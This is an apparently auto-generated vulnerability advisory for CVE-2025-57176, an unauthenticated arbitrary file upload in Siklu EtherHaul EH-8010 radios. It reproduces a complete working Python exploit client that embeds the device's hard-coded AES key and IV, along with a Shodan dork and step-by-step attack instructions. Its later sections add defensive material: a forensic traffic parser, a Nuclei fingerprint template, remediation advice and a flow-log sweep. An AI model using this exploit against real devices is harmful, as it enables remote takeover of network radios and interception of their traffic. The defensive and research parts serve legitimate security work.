[webapps] Siklu EtherHaul Series EH-8010 - Arbitrary File Upload

CVE-2025-57176

The Siklu EtherHaul EH-8010 exposes an unauthenticated file upload that can lead to remote code execution.

Critical · CVSS 9.8

📋 Vulnerability Summary

CVE: CVE-2025-57176
Type: Arbitrary file upload → remote code execution
Affected: Siklu EtherHaul Series EH-8010 (the summary lists all firmware versions; the detection template below scopes it to 7.4.0 through 10.7.3)
Severity: Critical · CVSS 9.8
Published: 2026-01-17
Submitted by: semaja2 - Andrew James <semaja2@gmail.com>
Source: Exploit-DB (original entry)

🔬 Root Cause

The radio runs a service the PoC calls rfpiped on TCP port 555. It accepts a message of type 0x04 ("file upload") that writes an attacker-supplied body to a destination path copied verbatim from the message header. No credential, session token, nonce or path restriction appears anywhere in the exchange. The only obstacle is that the stream is AES-256-CBC encrypted, but the key and the initial IV are fixed values that the PoC simply embeds, so anyone who can reach the port can produce valid messages and choose where on the device the file lands.

🎯 Attack Scenario

1. Locate reachable devices (the PoC suggests the Shodan dork "EH-8010" or "EH-1200") and confirm that TCP/555 is open.
2. Build a 0x90-byte header: msg = 0x04, the payload length at offset 0x08, the destination path (NUL-terminated) at offset 0x10, and the byte-sum checksum at offset 0x0C.
3. Encrypt the header and the zero-padded file contents with the hard-coded AES-256-CBC key and IV and send them over the connection; optionally read back the encrypted response header to see the daemon's status.
4. The daemon writes the file to the chosen path. Execution follows when that path is one the device later runs or serves; the advisory does not specify which on-device path the author used.

💥 Impact

An attacker gains remote code execution and full control of the radio, enabling traffic hijacking on the link, configuration tampering, disclosure of sensitive data and denial of service.

⚔️ Original PoC

The Exploit-DB entry ships a complete client for the rfpiped service (below). It speaks the device's encrypted TCP/555 protocol directly rather than going through the web interface: a fixed-size header selects message 0x04 and the destination path, the file body follows zero-padded to an AES block boundary, and both are AES-256-CBC encrypted under the key and IV hard-coded in the script. Usage: python3 <script> <target> --path <remote path> --file <local file> [--recv]. It requires pycryptodome (Crypto.Cipher.AES).

#!/usr/bin/env python3
# Shodan Dork: "EH-8010" or "EH-1200"
# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
# Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/
#
# rfpiped file-upload client (message type 0x04). Needs pycryptodome for
# Crypto.Cipher.AES:  pip install pycryptodome
import argparse, socket, struct
from Crypto.Cipher import AES

PORT = 555       # TCP port of the rfpiped service
HDR_LEN = 0x90   # fixed header size; the path field occupies 0x10..0x8F

# Hard-coded AES-256 key and initial CBC IV. Nothing device-specific is needed:
# every later IV is the last ciphertext block of the previous message.
IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72)
KEY = bytes([
    0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5,
    0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17,
    0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0,
    0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82
])


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes from the socket, or raise if the peer closes early."""
    out = bytearray()
    while len(out) < n:
        chunk = sock.recv(n - len(out))
        if not chunk:
            raise ConnectionError('socket closed')
        out += chunk
    return bytes(out)


def pad16_zero(b: bytes) -> bytes:
    """Zero-pad to an AES block boundary; the real length travels in the header."""
    r = len(b) & 0x0F
    return b if r == 0 else (b + b'\x00' * (16 - r))


def hdr_checksum(hdr: bytes) -> int:
    """32-bit byte sum over the header, skipping the checksum field at 0x0C..0x10."""
    return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF


def build_header(flag: int, msg: int, payload_len: int, path: bytes) -> bytes:
    """Layout: flag@0x00, msg@0x01, LE32 payload length@0x08, LE32 checksum@0x0C,
    NUL-terminated destination path@0x10 (truncated to 0x80 bytes)."""
    hdr = bytearray(HDR_LEN)
    hdr[0] = flag & 0xFF
    hdr[1] = msg & 0xFF
    struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF)
    p = path if path.endswith(b'\x00') else (path + b'\x00')
    max_path = HDR_LEN - 0x10
    hdr[0x10:0x10 + min(len(p), max_path)] = p[:max_path]
    struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr))
    return bytes(hdr)


class RFPipeSession:
    """AES-CBC framing with per-direction IV chaining."""

    def __init__(self, key: bytes, iv0: bytes):
        self.key = key
        self.send_iv = iv0
        self.recv_iv = iv0

    def enc_send(self, sock: socket.socket, data: bytes) -> None:
        # data must already be a multiple of 16 bytes (a header or a padded body)
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv)
        ct = cipher.encrypt(data)
        self.send_iv = ct[-16:]   # chain: the next message continues this CBC stream
        sock.sendall(ct)

    def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes:
        if n_plain <= 0:
            return b''
        n_padded = (n_plain + 15) & ~15   # bodies arrive padded to 16; trim by the advertised length
        ct = recv_exact(sock, n_padded)
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
        pt = cipher.decrypt(ct)
        self.recv_iv = ct[-16:]
        return pt[:n_plain]

    def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None:
        if len(hdr_plain) != HDR_LEN:
            raise ValueError('header must be 0x90 bytes')
        self.enc_send(sock, hdr_plain)

    def recv_header(self, sock: socket.socket) -> bytes:
        ct = recv_exact(sock, HDR_LEN)
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
        pt = cipher.decrypt(ct)
        self.recv_iv = ct[-16:]
        return pt


def connect_any(host: str, port: int) -> socket.socket:
    """Connect over IPv4 or IPv6, whichever resolves and answers first."""
    infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
    last_err = None
    for fam, st, proto, _, sa in infos:
        s = socket.socket(fam, st, proto)
        try:
            s.connect(sa)
            return s
        except Exception as e:
            last_err = e
            s.close()
    raise ConnectionError(f'connect failed: {last_err}')


def main():
    ap = argparse.ArgumentParser(description='rfpiped file upload client (msg 0x04)')
    ap.add_argument('target', help='IPv4/IPv6 address')
    ap.add_argument('--path', required=True, help='remote path string for header+0x10 (NUL will be appended)')
    ap.add_argument('--file', required=True, help='local file to send as payload')
    ap.add_argument('--recv', action='store_true', help='receive and print server ACK/response')
    args = ap.parse_args()

    with open(args.file, 'rb') as f:
        payload = f.read()
    path_bytes = args.path.encode('utf-8')
    hdr_plain = build_header(flag=0x00, msg=0x04, payload_len=len(payload), path=path_bytes)

    sess = RFPipeSession(KEY, IV0)
    with connect_any(args.target, PORT) as s:
        sess.send_header(s, hdr_plain)               # header first ...
        if payload:
            sess.enc_send(s, pad16_zero(payload))    # ... then the padded file body
        if args.recv:
            rh = sess.recv_header(s)
            flag = rh[0]; rmsg = rh[1]
            rlen = struct.unpack_from('<I', rh, 0x08)[0]
            print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}')
            if rmsg in (0x03, 0x05):   # response types the author treats as carrying no body
                return
            if rlen:
                body = sess.dec_recv(s, rlen)
                if body.endswith(b'\x00'):
                    body = body[:-1]
                try:
                    print(body.decode('utf-8', errors='replace'))
                except Exception:
                    print(body.hex())


if __name__ == '__main__':
    main()

🔬 Deep Technical Analysis

Framing. Every message starts with a 0x90-byte header: flag at 0x00, message type at 0x01, little-endian payload length at 0x08, little-endian checksum at 0x0C, and a NUL-terminated destination path filling 0x10..0x8F (anything longer than 0x80 bytes is truncated). The checksum is a plain 32-bit sum of the header bytes excluding the checksum field. It catches corruption but provides no integrity against an adversary: anyone can recompute it after changing the path or length.

Encryption. The session uses AES-256-CBC. The first block in each direction is chained from the static IV0; after that, each message's IV is the last ciphertext block of the previous message in that direction. That is exactly one continuous CBC stream per direction, so a captured connection can be decrypted in a single pass with the hard-coded key and IV0. This cuts both ways: it is what makes the PoC trivial to write, and it is what lets a defender with a packet capture recover exactly which file was written where.

Payload. The body is zero-padded to a 16-byte boundary and the receiver trims it using the header's length field. When asked to read a reply, the PoC decrypts one header and, unless the type is 0x03 or 0x05, a body of the advertised length; the advisory does not document what those reply types mean beyond the PoC treating them as having no body.

Authentication. None. No credential, nonce or device-specific secret enters the exchange, so the key has to be the same on every unit, and possession of it is the entire capability. Encryption under a fixed, shipped key is obfuscation, not access control.
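The framing above is easiest to verify by parsing it. The following is an added example written for this page, not code from the Exploit-DB PoC or from Siklu: it builds plaintext rfpiped messages with the header layout the PoC uses, then splits a decrypted client-to-device stream back into (header, payload) pairs and checks each byte-sum. Because of the IV chaining described above, one AES-CBC decryption of a captured direction yields precisely such a stream, so this is the second half of a forensic decode. The sample traffic and the destination paths in it are constructed here and are not from the advisory.

```python
"""Parser for decrypted rfpiped traffic. Added example, not part of the
Exploit-DB PoC or any Siklu code. It assumes the framing the PoC uses:
a 0x90-byte header (flag@0x00, msg@0x01, LE32 payload length@0x08, LE32 byte-sum
checksum@0x0C, NUL-terminated path@0x10) followed by the payload zero-padded to
16 bytes. Because the PoC chains each message's CBC IV from the previous
ciphertext block, a whole client->device direction decrypts as one CBC stream
into exactly this layout; split_stream() turns that plaintext back into
(header, payload) pairs. The sample traffic below is constructed here.
"""
import struct
from dataclasses import dataclass
from typing import List, Tuple

HDR_LEN = 0x90
PATH_OFF = 0x10
MSG_FILE_UPLOAD = 0x04     # the only message type the PoC sends


@dataclass(frozen=True)
class RfpHeader:
    flag: int
    msg: int
    payload_len: int
    checksum: int
    path: bytes
    checksum_ok: bool


def byte_sum_checksum(hdr: bytes) -> int:
    """Sum of every header byte except the checksum field itself (0x0C..0x10)."""
    return (sum(hdr[:0x0C]) + sum(hdr[PATH_OFF:HDR_LEN])) & 0xFFFFFFFF


def pad16(b: bytes) -> bytes:
    """Zero-pad to a 16-byte boundary, as the PoC does before encrypting."""
    return b + b'\x00' * (-len(b) % 16)


def build_message(msg: int, path: bytes, payload: bytes, flag: int = 0) -> bytes:
    """Plaintext header + padded body for one message; used here to build sample data."""
    hdr = bytearray(HDR_LEN)
    hdr[0], hdr[1] = flag & 0xFF, msg & 0xFF
    struct.pack_into('<I', hdr, 0x08, len(payload))
    p = (path + b'\x00')[:HDR_LEN - PATH_OFF]
    hdr[PATH_OFF:PATH_OFF + len(p)] = p
    struct.pack_into('<I', hdr, 0x0C, byte_sum_checksum(hdr))
    return bytes(hdr) + pad16(payload)


def parse_header(hdr: bytes) -> RfpHeader:
    """Decode one header and verify its byte-sum. A failed sum usually means the
    stream was decrypted with the wrong key/IV, or is not rfpiped at all."""
    if len(hdr) != HDR_LEN:
        raise ValueError(f'header must be {HDR_LEN} bytes, got {len(hdr)}')
    payload_len, checksum = struct.unpack_from('<II', hdr, 0x08)
    path = hdr[PATH_OFF:].split(b'\x00', 1)[0]     # NUL-terminated, zero-filled
    return RfpHeader(hdr[0], hdr[1], payload_len, checksum, path,
                     checksum == byte_sum_checksum(hdr))


def split_stream(plain: bytes) -> List[Tuple[RfpHeader, bytes]]:
    """Walk a decrypted client->device stream and return (header, payload) pairs,
    trimming the zero padding with each header's length field."""
    out, off = [], 0
    while off + HDR_LEN <= len(plain):
        h = parse_header(plain[off:off + HDR_LEN])
        if not h.checksum_ok:
            raise ValueError(f'bad header checksum at offset {off:#x}')
        off += HDR_LEN
        padded = (h.payload_len + 15) & ~15
        if off + padded > len(plain):
            raise ValueError(f'truncated payload at offset {off:#x}')
        out.append((h, plain[off:off + h.payload_len]))
        off += padded
    return out


def summarize(plain: bytes) -> List[str]:
    """One line per message: type, destination path and body size."""
    return [f'msg=0x{h.msg:02x} path={h.path.decode("utf-8", "replace")} bytes={len(p)}'
            for h, p in split_stream(plain)]


# Constructed sample: what one CBC decryption of an attacker's session would
# yield if two files were uploaded (hypothetical paths, not from the advisory).
SAMPLE_STREAM = (
    build_message(MSG_FILE_UPLOAD, b'/tmp/test.txt', b'hello rfpiped\n')
    + build_message(MSG_FILE_UPLOAD, b'/tmp/empty', b'')
)

if __name__ == '__main__':
    for line in summarize(SAMPLE_STREAM):
        print(line)
```

To use it on a real capture, decrypt the client-to-device bytes in one AES-256-CBC pass with the PoC's KEY and IV0 and feed the result to split_stream(); a checksum failure on the very first header is the quickest sign that the key or IV is wrong for that firmware.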

🔍 Nuclei Detection Template

The following template fingerprints the device from its web interface. It does not contact TCP/555 or attempt an upload, so a match confirms an EtherHaul web interface (and, where the page exposes it, the firmware version), not exploitability. Use it to scope hosts, then verify exposure of port 555 separately.

id: CVE-2025-57176-detection

info:
  name: Siklu EtherHaul Series EH-8010/EH-1200 Unauthenticated Arbitrary File Upload Detection
  author: semaja2
  severity: critical
  description: Detects Siklu EtherHaul Series EH-8010/EH-1200 devices running firmware versions 7.4.0 to 10.7.3 which are vulnerable to unauthenticated arbitrary file upload.
  reference:
    - https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-57176
  classification:
    cvss-score: 9.8
    cve-id: CVE-2025-57176
  tags: siklu,etherhaul,file-upload,auth-bypass

http:
  - raw:
      - |-
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Siklu EtherHaul"
          - "EH-8010"
          - "EH-1200"
        condition: or
        part: body

      - type: word
        words:
          - "Siklu"
        part: body

    extractors:
      - type: regex
        name: firmware_version
        part: body
        regex:
          - 'Firmware Version: ([0-9]+\.[0-9]+\.[0-9]+)'
          - 'v([0-9]+\.[0-9]+\.[0-9]+)'
        group: 1


🛡️ Remediation

No vendor patch is listed. Because the upload channel is the raw TCP/555 service rather than the web interface, a WAF in front of HTTP does not cover it. Interim measures: filter TCP/555 (and every other management port) so that only the management network or a designated jump host can reach the radios; alert on any other client connecting to that port; and, where the device permits it, disable the service. Any unit that has been reachable on port 555 from an untrusted network should also be checked for unexpected files, since the write lands wherever the attacker chose.
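Restricting port 555 to a management host is only useful if the restriction is watched. The following is an added example, not from the advisory author or the vendor, that sweeps Zeek-style JSON conn records for TCP flows to port 555 on the radio subnet from any client outside the allow-list. The radio subnet, the allowed management host and the sample records are all constructed assumptions for the example.

```python
"""Flow-log sweep for clients talking to the rfpiped port. Added example, not
from the advisory author or the vendor. It assumes Zeek-style JSON conn records
(id.orig_h, id.resp_h, id.resp_p, proto, conn_state); the radio subnet, the
management allow-list and the sample records are all constructed here.
"""
import ipaddress
import json
from typing import Dict, Iterable, List

RFPIPED_PORT = 555
RADIO_NET = ipaddress.ip_network('10.20.30.0/24')       # assumed EtherHaul management subnet
ALLOWED_CLIENTS = {ipaddress.ip_address('10.0.0.5')}    # assumed NMS / jump host

# Constructed sample conn.log (JSON lines): one legitimate NMS session, an
# internet-sourced connection to 555, the same host on 443, and an internal
# host probing 555 that got no reply (conn_state S0).
SAMPLE_CONN_LOG = """\
{"ts":1736160001.1,"id.orig_h":"10.0.0.5","id.orig_p":51000,"id.resp_h":"10.20.30.7","id.resp_p":555,"proto":"tcp","conn_state":"SF"}
{"ts":1736160002.4,"id.orig_h":"198.51.100.23","id.orig_p":40022,"id.resp_h":"10.20.30.7","id.resp_p":555,"proto":"tcp","conn_state":"SF"}
{"ts":1736160003.0,"id.orig_h":"198.51.100.23","id.orig_p":40023,"id.resp_h":"10.20.30.7","id.resp_p":443,"proto":"tcp","conn_state":"SF"}
{"ts":1736160004.2,"id.orig_h":"10.0.0.9","id.orig_p":60010,"id.resp_h":"10.20.30.8","id.resp_p":555,"proto":"tcp","conn_state":"S0"}
"""


def unexpected_rfpiped_clients(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return every TCP flow to port 555 on a radio from a host that is not on the
    allow-list. Attempts without a reply (S0) count too: a scan is worth a look."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        if rec.get('proto') != 'tcp' or rec.get('id.resp_p') != RFPIPED_PORT:
            continue
        src = ipaddress.ip_address(rec['id.orig_h'])
        dst = ipaddress.ip_address(rec['id.resp_h'])
        if dst not in RADIO_NET or src in ALLOWED_CLIENTS:
            continue
        hits.append({'ts': rec['ts'], 'src': str(src), 'dst': str(dst),
                     'completed': rec.get('conn_state') == 'SF'})
    return hits


if __name__ == '__main__':
    for hit in unexpected_rfpiped_clients(SAMPLE_CONN_LOG.splitlines()):
        print(hit)
```

A completed flow (SF) from an unexpected client is the one to escalate: with no authentication on the service, a full TCP exchange on 555 is enough for a file to have been written.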

📎 References

- https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/
- https://nvd.nist.gov/vuln/detail/CVE-2025-57176
⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-09 17:45 | Source: Exploit-DB

[!] CONTACT_CHANNELS

For business cooperation, technical consulting or vulnerability feedback, contact the author through the channel below.

> PING_AUTHOR (@A1RedTeam)